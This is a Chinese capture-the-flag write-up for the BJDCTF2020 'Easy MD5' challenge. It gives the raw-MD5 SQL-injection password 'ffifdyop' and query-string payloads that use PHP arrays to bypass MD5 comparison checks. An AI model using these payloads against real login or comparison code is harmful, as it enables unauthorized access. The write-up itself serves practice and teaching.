[BJDCTF2020]Easy MD5

打开之后这个这破玩意
在这里插入图片描述
抓一下包发现了这个
Easy MD5_2.png

select * from ‘admin’ where password=md5($pass,true)

百度了一下MD5()ture漏洞

https://blog.csdn.net/March97/article/details/81222922

输入一下百度到的密码:

ffifdyop

进入了另一个页面,注释里发现了:

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

= =赵总无处不在!!!

之前做过一道题,这种可以数组绕过

构造payload:

?a[]=1&b[]=2

又得到了一串PHP

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

同理,数组绕过!

构造payload:

?param1[]=1&param2[]=2

EasyMD5_2.png

拿到Flag!!!!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值